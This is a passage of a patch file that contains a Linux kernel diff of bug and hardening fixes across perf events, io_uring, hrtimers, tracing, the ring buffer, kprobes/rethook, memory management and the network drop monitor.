+ #ifdef CONFIG_INFINIBAND_USER_MEM
+ 
+diff --git a/include/rdma/ib_verbs.h b/include/rdma/ib_verbs.h
+index 975d6e9efbcb4..5582509003264 100644
+--- a/include/rdma/ib_verbs.h
++++ b/include/rdma/ib_verbs.h
+@@ -2835,6 +2835,7 @@ struct ib_block_iter {
+ 	/* internal states */
+ 	struct scatterlist *__sg;	/* sg holding the current aligned block */
+ 	dma_addr_t __dma_addr;		/* unaligned DMA address of this block */
++	size_t __sg_numblocks;		/* ib_umem_num_dma_blocks() */
+ 	unsigned int __sg_nents;	/* number of SG entries */
+ 	unsigned int __sg_advance;	/* number of bytes to advance in sg in next step */
+ 	unsigned int __pg_bit;		/* alignment of current block */
+diff --git a/include/uapi/linux/netfilter/nf_tables.h b/include/uapi/linux/netfilter/nf_tables.h
+index 466fd3f4447c2..af8f4c304d272 100644
+--- a/include/uapi/linux/netfilter/nf_tables.h
++++ b/include/uapi/linux/netfilter/nf_tables.h
+@@ -816,12 +816,14 @@ enum nft_exthdr_flags {
+  * @NFT_EXTHDR_OP_TCP: match against tcp options
+  * @NFT_EXTHDR_OP_IPV4: match against ipv4 options
+  * @NFT_EXTHDR_OP_SCTP: match against sctp chunks
++ * @NFT_EXTHDR_OP_DCCP: match against dccp otions
+  */
+ enum nft_exthdr_op {
+ 	NFT_EXTHDR_OP_IPV6,
+ 	NFT_EXTHDR_OP_TCPOPT,
+ 	NFT_EXTHDR_OP_IPV4,
+ 	NFT_EXTHDR_OP_SCTP,
++	NFT_EXTHDR_OP_DCCP,
+ 	__NFT_EXTHDR_OP_MAX
+ };
+ #define NFT_EXTHDR_OP_MAX	(__NFT_EXTHDR_OP_MAX - 1)
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index f413ebed81ab3..35894955b4549 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1377,6 +1377,7 @@ static __cold void io_iopoll_try_reap_events(struct io_ring_ctx *ctx)
+ 	if (!(ctx->flags & IORING_SETUP_IOPOLL))
+ 		return;
+ 
++	percpu_ref_get(&ctx->refs);
+ 	mutex_lock(&ctx->uring_lock);
+ 	while (!wq_list_empty(&ctx->iopoll_list)) {
+ 		/* let it sleep and repeat later if can't complete a request */
+@@ -1394,6 +1395,7 @@ static __cold void io_iopoll_try_reap_events(struct io_ring_ctx *ctx)
+ 		}
+ 	}
+ 	mutex_unlock(&ctx->uring_lock);
++	percpu_ref_put(&ctx->refs);
+ }
+ 
+ static int io_iopoll_check(struct io_ring_ctx *ctx, long min)
+@@ -2800,12 +2802,7 @@ static __cold void io_ring_exit_work(struct work_struct *work)
+ 	init_completion(&exit.completion);
+ 	init_task_work(&exit.task_work, io_tctx_exit_cb);
+ 	exit.ctx = ctx;
+-	/*
+-	 * Some may use context even when all refs and requests have been put,
+-	 * and they are free to do so while still holding uring_lock or
+-	 * completion_lock, see io_req_task_submit(). Apart from other work,
+-	 * this lock/unlock section also waits them to finish.
+-	 */
++
+ 	mutex_lock(&ctx->uring_lock);
+ 	while (!list_empty(&ctx->tctx_list)) {
+ 		WARN_ON_ONCE(time_after(jiffies, timeout));
+diff --git a/io_uring/rsrc.h b/io_uring/rsrc.h
+index d60c758326b42..acaf8dad05401 100644
+--- a/io_uring/rsrc.h
++++ b/io_uring/rsrc.h
+@@ -79,17 +79,10 @@ int io_sqe_files_register(struct io_ring_ctx *ctx, void __user *arg,
+ 
+ int __io_scm_file_account(struct io_ring_ctx *ctx, struct file *file);
+ 
+-#if defined(CONFIG_UNIX)
+-static inline bool io_file_need_scm(struct file *filp)
+-{
+-	return !!unix_get_socket(filp);
+-}
+-#else
+ static inline bool io_file_need_scm(struct file *filp)
+ {
+ 	return false;
+ }
+-#endif
+ 
+ static inline int io_scm_file_account(struct io_ring_ctx *ctx,
+ 				      struct file *file)
+diff --git a/kernel/cgroup/legacy_freezer.c b/kernel/cgroup/legacy_freezer.c
+index 122dacb3a4439..66d1708042a72 100644
+--- a/kernel/cgroup/legacy_freezer.c
++++ b/kernel/cgroup/legacy_freezer.c
+@@ -66,9 +66,15 @@ static struct freezer *parent_freezer(struct freezer *freezer)
+ bool cgroup_freezing(struct task_struct *task)
+ {
+ 	bool ret;
++	unsigned int state;
+ 
+ 	rcu_read_lock();
+-	ret = task_freezer(task)->state & CGROUP_FREEZING;
++	/* Check if the cgroup is still FREEZING, but not FROZEN. The extra
++	 * !FROZEN check is required, because the FREEZING bit is not cleared
++	 * when the state FROZEN is reached.
++	 */
++	state = task_freezer(task)->state;
++	ret = (state & CGROUP_FREEZING) && !(state & CGROUP_FROZEN);
+ 	rcu_read_unlock();
+ 
+ 	return ret;
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index 0e4d362e90825..551468d9c5a85 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -1733,7 +1733,7 @@ static struct cpuhp_step cpuhp_hp_states[] = {
+ 	[CPUHP_HRTIMERS_PREPARE] = {
+ 		.name			= "hrtimers:prepare",
+ 		.startup.single		= hrtimers_prepare_cpu,
+-		.teardown.single	= hrtimers_dead_cpu,
++		.teardown.single	= NULL,
+ 	},
+ 	[CPUHP_SMPCFD_PREPARE] = {
+ 		.name			= "smpcfd:prepare",
+@@ -1800,6 +1800,12 @@ static struct cpuhp_step cpuhp_hp_states[] = {
+ 		.startup.single		= NULL,
+ 		.teardown.single	= smpcfd_dying_cpu,
+ 	},
++	[CPUHP_AP_HRTIMERS_DYING] = {
++		.name			= "hrtimers:dying",
++		.startup.single		= NULL,
++		.teardown.single	= hrtimers_cpu_dying,
++	},
++
+ 	/* Entry state on starting. Interrupts enabled from here on. Transient
+ 	 * state for synchronsization */
+ 	[CPUHP_AP_ONLINE] = {
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 8f2b9d8b9150e..0193243f65e5c 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -1812,31 +1812,34 @@ static inline void perf_event__state_init(struct perf_event *event)
+ 					      PERF_EVENT_STATE_INACTIVE;
+ }
+ 
+-static void __perf_event_read_size(struct perf_event *event, int nr_siblings)
++static int __perf_event_read_size(u64 read_format, int nr_siblings)
+ {
+ 	int entry = sizeof(u64); /* value */
+ 	int size = 0;
+ 	int nr = 1;
+ 
+-	if (event->attr.read_format & PERF_FORMAT_TOTAL_TIME_ENABLED)
++	if (read_format & PERF_FORMAT_TOTAL_TIME_ENABLED)
+ 		size += sizeof(u64);
+ 
+-	if (event->attr.read_format & PERF_FORMAT_TOTAL_TIME_RUNNING)
++	if (read_format & PERF_FORMAT_TOTAL_TIME_RUNNING)
+ 		size += sizeof(u64);
+ 
+-	if (event->attr.read_format & PERF_FORMAT_ID)
++	if (read_format & PERF_FORMAT_ID)
+ 		entry += sizeof(u64);
+ 
+-	if (event->attr.read_format & PERF_FORMAT_LOST)
++	if (read_format & PERF_FORMAT_LOST)
+ 		entry += sizeof(u64);
+ 
+-	if (event->attr.read_format & PERF_FORMAT_GROUP) {
++	if (read_format & PERF_FORMAT_GROUP) {
+ 		nr += nr_siblings;
+ 		size += sizeof(u64);
+ 	}
+ 
+-	size += entry * nr;
+-	event->read_size = size;
++	/*
++	 * Since perf_event_validate_size() limits this to 16k and inhibits
++	 * adding more siblings, this will never overflow.
++	 */
++	return size + nr * entry;
+ }
+ 
+ static void __perf_event_header_size(struct perf_event *event, u64 sample_type)
+@@ -1886,8 +1889,9 @@ static void __perf_event_header_size(struct perf_event *event, u64 sample_type)
+  */
+ static void perf_event__header_size(struct perf_event *event)
+ {
+-	__perf_event_read_size(event,
+-			       event->group_leader->nr_siblings);
++	event->read_size =
++		__perf_event_read_size(event->attr.read_format,
++				       event->group_leader->nr_siblings);
+ 	__perf_event_header_size(event, event->attr.sample_type);
+ }
+ 
+@@ -1918,24 +1922,35 @@ static void perf_event__id_header_size(struct perf_event *event)
+ 	event->id_header_size = size;
+ }
+ 
++/*
++ * Check that adding an event to the group does not result in anybody
++ * overflowing the 64k event limit imposed by the output buffer.
++ *
++ * Specifically, check that the read_size for the event does not exceed 16k,
++ * read_size being the one term that grows with groups size. Since read_size
++ * depends on per-event read_format, also (re)check the existing events.
++ *
++ * This leaves 48k for the constant size fields and things like callchains,
++ * branch stacks and register sets.
++ */
+ static bool perf_event_validate_size(struct perf_event *event)
+ {
+-	/*
+-	 * The values computed here will be over-written when we actually
+-	 * attach the event.
+-	 */
+-	__perf_event_read_size(event, event->group_leader->nr_siblings + 1);
+-	__perf_event_header_size(event, event->attr.sample_type & ~PERF_SAMPLE_READ);
+-	perf_event__id_header_size(event);
++	struct perf_event *sibling, *group_leader = event->group_leader;
+ 
+-	/*
+-	 * Sum the lot; should not exceed the 64k limit we have on records.
+-	 * Conservative limit to allow for callchains and other variable fields.
+-	 */
+-	if (event->read_size + event->header_size +
+-	    event->id_header_size + sizeof(struct perf_event_header) >= 16*1024)
++	if (__perf_event_read_size(event->attr.read_format,
++				   group_leader->nr_siblings + 1) > 16*1024)
+ 		return false;
+ 
++	if (__perf_event_read_size(group_leader->attr.read_format,
++				   group_leader->nr_siblings + 1) > 16*1024)
++		return false;
++
++	for_each_sibling_event(sibling, group_leader) {
++		if (__perf_event_read_size(sibling->attr.read_format,
++					   group_leader->nr_siblings + 1) > 16*1024)
++			return false;
++	}
++
+ 	return true;
+ }
+ 
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index 3da9726232ff9..dbfddfa86c14e 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -2253,7 +2253,7 @@ int register_kretprobe(struct kretprobe *rp)
+ 	if (!rp->rph)
+ 		return -ENOMEM;
+ 
+-	rp->rph->rp = rp;
++	rcu_assign_pointer(rp->rph->rp, rp);
+ 	for (i = 0; i < rp->maxactive; i++) {
+ 		inst = kzalloc(sizeof(struct kretprobe_instance) +
+ 			       rp->data_size, GFP_KERNEL);
+@@ -2314,7 +2314,7 @@ void unregister_kretprobes(struct kretprobe **rps, int num)
+ #ifdef CONFIG_KRETPROBE_ON_RETHOOK
+ 		rethook_free(rps[i]->rh);
+ #else
+-		rps[i]->rph->rp = NULL;
++		rcu_assign_pointer(rps[i]->rph->rp, NULL);
+ #endif
+ 	}
+ 	mutex_unlock(&kprobe_mutex);
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index e4f0e3b0c4f4f..5561dabc9b225 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2216,29 +2216,22 @@ static void migrate_hrtimer_list(struct hrtimer_clock_base *old_base,
+ 	}
+ }
+ 
+-int hrtimers_dead_cpu(unsigned int scpu)
++int hrtimers_cpu_dying(unsigned int dying_cpu)
+ {
+ 	struct hrtimer_cpu_base *old_base, *new_base;
+-	int i;
++	int i, ncpu = cpumask_first(cpu_active_mask);
+ 
+-	BUG_ON(cpu_online(scpu));
+-	tick_cancel_sched_timer(scpu);
++	tick_cancel_sched_timer(dying_cpu);
++
++	old_base = this_cpu_ptr(&hrtimer_bases);
++	new_base = &per_cpu(hrtimer_bases, ncpu);
+ 
+-	/*
+-	 * this BH disable ensures that raise_softirq_irqoff() does
+-	 * not wakeup ksoftirqd (and acquire the pi-lock) while
+-	 * holding the cpu_base lock
+-	 */
+-	local_bh_disable();
+-	local_irq_disable();
+-	old_base = &per_cpu(hrtimer_bases, scpu);
+-	new_base = this_cpu_ptr(&hrtimer_bases);
+ 	/*
+ 	 * The caller is globally serialized and nobody else
+ 	 * takes two locks at once, deadlock is not possible.
+ 	 */
+-	raw_spin_lock(&new_base->lock);
+-	raw_spin_lock_nested(&old_base->lock, SINGLE_DEPTH_NESTING);
++	raw_spin_lock(&old_base->lock);
++	raw_spin_lock_nested(&new_base->lock, SINGLE_DEPTH_NESTING);
+ 
+ 	for (i = 0; i < HRTIMER_MAX_CLOCK_BASES; i++) {
+ 		migrate_hrtimer_list(&old_base->clock_base[i],
+@@ -2249,15 +2242,13 @@ int hrtimers_dead_cpu(unsigned int scpu)
+ 	 * The migration might have changed the first expiring softirq
+ 	 * timer on this CPU. Update it.
+ 	 */
+-	hrtimer_update_softirq_timer(new_base, false);
++	__hrtimer_get_next_event(new_base, HRTIMER_ACTIVE_SOFT);
++	/* Tell the other CPU to retrigger the next event */
++	smp_call_function_single(ncpu, retrigger_next_event, NULL, 0);
+ 
+-	raw_spin_unlock(&old_base->lock);
+ 	raw_spin_unlock(&new_base->lock);
++	raw_spin_unlock(&old_base->lock);
+ 
+-	/* Check, if we got expired work to do */
+-	__hrtimer_peek_ahead_timers();
+-	local_irq_enable();
+-	local_bh_enable();
+ 	return 0;
+ }
+ 
+diff --git a/kernel/trace/rethook.c b/kernel/trace/rethook.c
+index 468006cce7cae..3686626b52c57 100644
+--- a/kernel/trace/rethook.c
++++ b/kernel/trace/rethook.c
+@@ -63,7 +63,7 @@ static void rethook_free_rcu(struct rcu_head *head)
+  */
+ void rethook_stop(struct rethook *rh)
+ {
+-	WRITE_ONCE(rh->handler, NULL);
++	rcu_assign_pointer(rh->handler, NULL);
+ }
+ 
+ /**
+@@ -78,11 +78,17 @@ void rethook_stop(struct rethook *rh)
+  */
+ void rethook_free(struct rethook *rh)
+ {
+-	WRITE_ONCE(rh->handler, NULL);
++	rethook_stop(rh);
+ 
+ 	call_rcu(&rh->rcu, rethook_free_rcu);
+ }
+ 
++static inline rethook_handler_t rethook_get_handler(struct rethook *rh)
++{
++	return (rethook_handler_t)rcu_dereference_check(rh->handler,
++							rcu_read_lock_any_held());
++}
++
+ /**
+  * rethook_alloc() - Allocate struct rethook.
+  * @data: a data to pass the @handler when hooking the return.
+@@ -102,7 +108,7 @@ struct rethook *rethook_alloc(void *data, rethook_handler_t handler)
+ 	}
+ 
+ 	rh->data = data;
+-	rh->handler = handler;
++	rcu_assign_pointer(rh->handler, handler);
+ 	rh->pool.head = NULL;
+ 	refcount_set(&rh->ref, 1);
+ 
+@@ -142,9 +148,10 @@ static void free_rethook_node_rcu(struct rcu_head *head)
+  */
+ void rethook_recycle(struct rethook_node *node)
+ {
+-	lockdep_assert_preemption_disabled();
++	rethook_handler_t handler;
+ 
+-	if (likely(READ_ONCE(node->rethook->handler)))
++	handler = rethook_get_handler(node->rethook);
++	if (likely(handler))
+ 		freelist_add(&node->freelist, &node->rethook->pool);
+ 	else
+ 		call_rcu(&node->rcu, free_rethook_node_rcu);
+@@ -160,11 +167,9 @@ NOKPROBE_SYMBOL(rethook_recycle);
+  */
+ struct rethook_node *rethook_try_get(struct rethook *rh)
+ {
+-	rethook_handler_t handler = READ_ONCE(rh->handler);
++	rethook_handler_t handler = rethook_get_handler(rh);
+ 	struct freelist_node *fn;
+ 
+-	lockdep_assert_preemption_disabled();
+-
+ 	/* Check whether @rh is going to be freed. */
+ 	if (unlikely(!handler))
+ 		return NULL;
+@@ -312,7 +317,7 @@ unsigned long rethook_trampoline_handler(struct pt_regs *regs,
+ 		rhn = container_of(first, struct rethook_node, llist);
+ 		if (WARN_ON_ONCE(rhn->frame != frame))
+ 			break;
+-		handler = READ_ONCE(rhn->rethook->handler);
++		handler = rethook_get_handler(rhn->rethook);
+ 		if (handler)
+ 			handler(rhn, rhn->rethook->data, regs);
+ 
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index b7383358c4ea1..c02a4cb879913 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -646,8 +646,8 @@ static inline bool __rb_time_read(rb_time_t *t, u64 *ret, unsigned long *cnt)
+ 
+ 	*cnt = rb_time_cnt(top);
+ 
+-	/* If top and bottom counts don't match, this interrupted a write */
+-	if (*cnt != rb_time_cnt(bottom))
++	/* If top and msb counts don't match, this interrupted a write */
++	if (*cnt != rb_time_cnt(msb))
+ 		return false;
+ 
+ 	/* The shift to msb will lose its cnt bits */
+@@ -3025,22 +3025,19 @@ rb_try_to_discard(struct ring_buffer_per_cpu *cpu_buffer,
+ 			local_read(&bpage->write) & ~RB_WRITE_MASK;
+ 		unsigned long event_length = rb_event_length(event);
+ 
++		/*
++		 * For the before_stamp to be different than the write_stamp
++		 * to make sure that the next event adds an absolute
++		 * value and does not rely on the saved write stamp, which
++		 * is now going to be bogus.
++		 */
++		rb_time_set(&cpu_buffer->before_stamp, 0);
++
+ 		/* Something came in, can't discard */
+ 		if (!rb_time_cmpxchg(&cpu_buffer->write_stamp,
+ 				       write_stamp, write_stamp - delta))
+ 			return 0;
+ 
+-		/*
+-		 * It's possible that the event time delta is zero
+-		 * (has the same time stamp as the previous event)
+-		 * in which case write_stamp and before_stamp could
+-		 * be the same. In such a case, force before_stamp
+-		 * to be different than write_stamp. It doesn't
+-		 * matter what it is, as long as its different.
+-		 */
+-		if (!delta)
+-			rb_time_set(&cpu_buffer->before_stamp, 0);
+-
+ 		/*
+ 		 * If an event were to come in now, it would see that the
+ 		 * write_stamp and the before_stamp are different, and assume
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index ddcfc78e93e00..d2db4d6f0f2fd 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -2297,13 +2297,7 @@ int is_tracing_stopped(void)
+ 	return global_trace.stop_count;
+ }
+ 
+-/**
+- * tracing_start - quick start of the tracer
+- *
+- * If tracing is enabled but was stopped by tracing_stop,
+- * this will start the tracer back up.
+- */
+-void tracing_start(void)
++static void tracing_start_tr(struct trace_array *tr)
+ {
+ 	struct trace_buffer *buffer;
+ 	unsigned long flags;
+@@ -2311,119 +2305,83 @@ void tracing_start(void)
+ 	if (tracing_disabled)
+ 		return;
+ 
+-	raw_spin_lock_irqsave(&global_trace.start_lock, flags);
+-	if (--global_trace.stop_count) {
+-		if (global_trace.stop_count < 0) {
++	raw_spin_lock_irqsave(&tr->start_lock, flags);
++	if (--tr->stop_count) {
++		if (WARN_ON_ONCE(tr->stop_count < 0)) {
+ 			/* Someone screwed up their debugging */
+-			WARN_ON_ONCE(1);
+-			global_trace.stop_count = 0;
++			tr->stop_count = 0;
+ 		}
+ 		goto out;
+ 	}
+ 
+ 	/* Prevent the buffers from switching */
+-	arch_spin_lock(&global_trace.max_lock);
++	arch_spin_lock(&tr->max_lock);
+ 
+-	buffer = global_trace.array_buffer.buffer;
++	buffer = tr->array_buffer.buffer;
+ 	if (buffer)
+ 		ring_buffer_record_enable(buffer);
+ 
+ #ifdef CONFIG_TRACER_MAX_TRACE
+-	buffer = global_trace.max_buffer.buffer;
++	buffer = tr->max_buffer.buffer;
+ 	if (buffer)
+ 		ring_buffer_record_enable(buffer);
+ #endif
+ 
+-	arch_spin_unlock(&global_trace.max_lock);
+-
+- out:
+-	raw_spin_unlock_irqrestore(&global_trace.start_lock, flags);
+-}
+-
+-static void tracing_start_tr(struct trace_array *tr)
+-{
+-	struct trace_buffer *buffer;
+-	unsigned long flags;
+-
+-	if (tracing_disabled)
+-		return;
+-
+-	/* If global, we need to also start the max tracer */
+-	if (tr->flags & TRACE_ARRAY_FL_GLOBAL)
+-		return tracing_start();
+-
+-	raw_spin_lock_irqsave(&tr->start_lock, flags);
+-
+-	if (--tr->stop_count) {
+-		if (tr->stop_count < 0) {
+-			/* Someone screwed up their debugging */
+-			WARN_ON_ONCE(1);
+-			tr->stop_count = 0;
+-		}
+-		goto out;
+-	}
+-
+-	buffer = tr->array_buffer.buffer;
+-	if (buffer)
+-		ring_buffer_record_enable(buffer);
++	arch_spin_unlock(&tr->max_lock);
+ 
+  out:
+ 	raw_spin_unlock_irqrestore(&tr->start_lock, flags);
+ }
+ 
+ /**
+- * tracing_stop - quick stop of the tracer
++ * tracing_start - quick start of the tracer
+  *
+- * Light weight way to stop tracing. Use in conjunction with
+- * tracing_start.
++ * If tracing is enabled but was stopped by tracing_stop,
++ * this will start the tracer back up.
+  */
+-void tracing_stop(void)
++void tracing_start(void)
++
++{
++	return tracing_start_tr(&global_trace);
++}
++
++static void tracing_stop_tr(struct trace_array *tr)
+ {
+ 	struct trace_buffer *buffer;
+ 	unsigned long flags;
+ 
+-	raw_spin_lock_irqsave(&global_trace.start_lock, flags);
+-	if (global_trace.stop_count++)
++	raw_spin_lock_irqsave(&tr->start_lock, flags);
++	if (tr->stop_count++)
+ 		goto out;
+ 
+ 	/* Prevent the buffers from switching */
+-	arch_spin_lock(&global_trace.max_lock);
++	arch_spin_lock(&tr->max_lock);
+ 
+-	buffer = global_trace.array_buffer.buffer;
++	buffer = tr->array_buffer.buffer;
+ 	if (buffer)
+ 		ring_buffer_record_disable(buffer);
+ 
+ #ifdef CONFIG_TRACER_MAX_TRACE
+-	buffer = global_trace.max_buffer.buffer;
++	buffer = tr->max_buffer.buffer;
+ 	if (buffer)
+ 		ring_buffer_record_disable(buffer);
+ #endif
+ 
+-	arch_spin_unlock(&global_trace.max_lock);
++	arch_spin_unlock(&tr->max_lock);
+ 
+  out:
+-	raw_spin_unlock_irqrestore(&global_trace.start_lock, flags);
++	raw_spin_unlock_irqrestore(&tr->start_lock, flags);
+ }
+ 
+-static void tracing_stop_tr(struct trace_array *tr)
++/**
++ * tracing_stop - quick stop of the tracer
++ *
++ * Light weight way to stop tracing. Use in conjunction with
++ * tracing_start.
++ */
++void tracing_stop(void)
+ {
+-	struct trace_buffer *buffer;
+-	unsigned long flags;
+-
+-	/* If global, we need to also stop the max tracer */
+-	if (tr->flags & TRACE_ARRAY_FL_GLOBAL)
+-		return tracing_stop();
+-
+-	raw_spin_lock_irqsave(&tr->start_lock, flags);
+-	if (tr->stop_count++)
+-		goto out;
+-
+-	buffer = tr->array_buffer.buffer;
+-	if (buffer)
+-		ring_buffer_record_disable(buffer);
+-
+- out:
+-	raw_spin_unlock_irqrestore(&tr->start_lock, flags);
++	return tracing_stop_tr(&global_trace);
+ }
+ 
+ static int trace_save_cmdline(struct task_struct *tsk)
+@@ -2707,8 +2665,11 @@ void trace_buffered_event_enable(void)
+ 	for_each_tracing_cpu(cpu) {
+ 		page = alloc_pages_node(cpu_to_node(cpu),
+ 					GFP_KERNEL | __GFP_NORETRY, 0);
+-		if (!page)
+-			goto failed;
++		/* This is just an optimization and can handle failures */
++		if (!page) {
++			pr_err("Failed to allocate event buffer\n");
++			break;
++		}
+ 
+ 		event = page_address(page);
+ 		memset(event, 0, sizeof(*event));
+@@ -2722,10 +2683,6 @@ void trace_buffered_event_enable(void)
+ 			WARN_ON_ONCE(1);
+ 		preempt_enable();
+ 	}
+-
+-	return;
+- failed:
+-	trace_buffered_event_disable();
+ }
+ 
+ static void enable_trace_buffered_event(void *data)
+@@ -2760,11 +2717,9 @@ void trace_buffered_event_disable(void)
+ 	if (--trace_buffered_event_ref)
+ 		return;
+ 
+-	preempt_disable();
+ 	/* For each CPU, set the buffer as used. */
+-	smp_call_function_many(tracing_buffer_mask,
+-			       disable_trace_buffered_event, NULL, 1);
+-	preempt_enable();
++	on_each_cpu_mask(tracing_buffer_mask, disable_trace_buffered_event,
++			 NULL, true);
+ 
+ 	/* Wait for all current users to finish */
+ 	synchronize_rcu();
+@@ -2773,17 +2728,19 @@ void trace_buffered_event_disable(void)
+ 		free_page((unsigned long)per_cpu(trace_buffered_event, cpu));
+ 		per_cpu(trace_buffered_event, cpu) = NULL;
+ 	}
++
+ 	/*
+-	 * Make sure trace_buffered_event is NULL before clearing
+-	 * trace_buffered_event_cnt.
++	 * Wait for all CPUs that potentially started checking if they can use
++	 * their event buffer only after the previous synchronize_rcu() call and
++	 * they still read a valid pointer from trace_buffered_event. It must be
++	 * ensured they don't see cleared trace_buffered_event_cnt else they
++	 * could wrongly decide to use the pointed-to buffer which is now freed.
+ 	 */
+-	smp_wmb();
++	synchronize_rcu();
+ 
+-	preempt_disable();
+-	/* Do the work on each cpu */
+-	smp_call_function_many(tracing_buffer_mask,
+-			       enable_trace_buffered_event, NULL, 1);
+-	preempt_enable();
++	/* For each CPU, relinquish the buffer */
++	on_each_cpu_mask(tracing_buffer_mask, enable_trace_buffered_event, NULL,
++			 true);
+ }
+ 
+ static struct trace_buffer *temp_buffer;
+@@ -6258,6 +6215,15 @@ static void set_buffer_entries(struct array_buffer *buf, unsigned long val)
+ 		per_cpu_ptr(buf->data, cpu)->entries = val;
+ }
+ 
++static void update_buffer_entries(struct array_buffer *buf, int cpu)
++{
++	if (cpu == RING_BUFFER_ALL_CPUS) {
++		set_buffer_entries(buf, ring_buffer_size(buf->buffer, 0));
++	} else {
++		per_cpu_ptr(buf->data, cpu)->entries = ring_buffer_size(buf->buffer, cpu);
++	}
++}
++
+ #ifdef CONFIG_TRACER_MAX_TRACE
+ /* resize @tr's buffer to the size of @size_tr's entries */
+ static int resize_buffer_duplicate_size(struct array_buffer *trace_buf,
+@@ -6302,13 +6268,15 @@ static int __tracing_resize_ring_buffer(struct trace_array *tr,
+ 	if (!tr->array_buffer.buffer)
+ 		return 0;
+ 
++	/* Do not allow tracing while resizng ring buffer */
++	tracing_stop_tr(tr);
++
+ 	ret = ring_buffer_resize(tr->array_buffer.buffer, size, cpu);
+ 	if (ret < 0)
+-		return ret;
++		goto out_start;
+ 
+ #ifdef CONFIG_TRACER_MAX_TRACE
+-	if (!(tr->flags & TRACE_ARRAY_FL_GLOBAL) ||
+-	    !tr->current_trace->use_max_tr)
++	if (!tr->current_trace->use_max_tr)
+ 		goto out;
+ 
+ 	ret = ring_buffer_resize(tr->max_buffer.buffer, size, cpu);
+@@ -6333,22 +6301,17 @@ static int __tracing_resize_ring_buffer(struct trace_array *tr,
+ 			WARN_ON(1);
+ 			tracing_disabled = 1;
+ 		}
+-		return ret;
++		goto out_start;
+ 	}
+ 
+-	if (cpu == RING_BUFFER_ALL_CPUS)
+-		set_buffer_entries(&tr->max_buffer, size);
+-	else
+-		per_cpu_ptr(tr->max_buffer.data, cpu)->entries = size;
++	update_buffer_entries(&tr->max_buffer, cpu);
+ 
+  out:
+ #endif /* CONFIG_TRACER_MAX_TRACE */
+ 
+-	if (cpu == RING_BUFFER_ALL_CPUS)
+-		set_buffer_entries(&tr->array_buffer, size);
+-	else
+-		per_cpu_ptr(tr->array_buffer.data, cpu)->entries = size;
+-
++	update_buffer_entries(&tr->array_buffer, cpu);
++ out_start:
++	tracing_start_tr(tr);
+ 	return ret;
+ }
+ 
+diff --git a/lib/zstd/common/fse_decompress.c b/lib/zstd/common/fse_decompress.c
+index 2c8bbe3e4c148..f37b7aec088ec 100644
+--- a/lib/zstd/common/fse_decompress.c
++++ b/lib/zstd/common/fse_decompress.c
+@@ -312,7 +312,7 @@ size_t FSE_decompress_wksp(void* dst, size_t dstCapacity, const void* cSrc, size
+ 
+ typedef struct {
+     short ncount[FSE_MAX_SYMBOL_VALUE + 1];
+-    FSE_DTable dtable[1]; /* Dynamically sized */
++    FSE_DTable dtable[]; /* Dynamically sized */
+ } FSE_DecompressWksp;
+ 
+ 
+diff --git a/mm/damon/sysfs.c b/mm/damon/sysfs.c
+index dbf5e4de97a0f..9ea21b6d266be 100644
+--- a/mm/damon/sysfs.c
++++ b/mm/damon/sysfs.c
+@@ -2210,7 +2210,7 @@ static int damon_sysfs_update_target(struct damon_target *target,
+ 		struct damon_ctx *ctx,
+ 		struct damon_sysfs_target *sys_target)
+ {
+-	int err;
++	int err = 0;
+ 
+ 	if (damon_target_has_pid(ctx)) {
+ 		err = damon_sysfs_update_target_pid(target, sys_target->pid);
+diff --git a/mm/filemap.c b/mm/filemap.c
+index 2d930470aacaa..d633ab8cd56f1 100644
+--- a/mm/filemap.c
++++ b/mm/filemap.c
+@@ -3319,7 +3319,7 @@ static bool filemap_map_pmd(struct vm_fault *vmf, struct page *page)
+ 		}
+ 	}
+ 
+-	if (pmd_none(*vmf->pmd))
++	if (pmd_none(*vmf->pmd) && vmf->prealloc_pte)
+ 		pmd_install(mm, vmf->pmd, &vmf->prealloc_pte);
+ 
+ 	/* See comment in handle_pte_fault() */
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index aa4a68dfb3b92..37288a7f0fa65 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -1189,6 +1189,13 @@ static int is_vma_resv_set(struct vm_area_struct *vma, unsigned long flag)
+ 	return (get_vma_private_data(vma) & flag) != 0;
+ }
+ 
++bool __vma_private_lock(struct vm_area_struct *vma)
++{
++	return !(vma->vm_flags & VM_MAYSHARE) &&
++		get_vma_private_data(vma) & ~HPAGE_RESV_MASK &&
++		is_vma_resv_set(vma, HPAGE_RESV_OWNER);
++}
++
+ void hugetlb_dup_vma_private(struct vm_area_struct *vma)
+ {
+ 	VM_BUG_ON_VMA(!is_vm_hugetlb_page(vma), vma);
+diff --git a/net/core/drop_monitor.c b/net/core/drop_monitor.c
+index f084a4a6b7ab2..8e0a90b45df22 100644
+--- a/net/core/drop_monitor.c
++++ b/net/core/drop_monitor.c
+@@ -181,7 +181,7 @@ out:
+ }
+ 
+ static const struct genl_multicast_group dropmon_mcgrps[] = {
+-	{ .name = "events", },
++	{ .name = "events", .cap_sys_admin = 1 },
+ };
+ 
+ static void send_dm_alert(struct work_struct *work)
+@@ -1604,11 +1604,13 @@ static const struct genl_small_ops dropmon_ops[] = {
+ 		.cmd = NET_DM_CMD_START,
+ 		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = net_dm_cmd_trace,
++		.flags = GENL_ADMIN_PERM,
+ 	},
+ 	{
+ 		.cmd = NET_DM_CMD_STOP,
+ 		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = net_dm_cmd_trace,
++		.flags = GENL_ADMIN_PERM,
+ 	},
+ 	{
+ 		.cmd = NET_DM_CMD_CONFIG_GET,
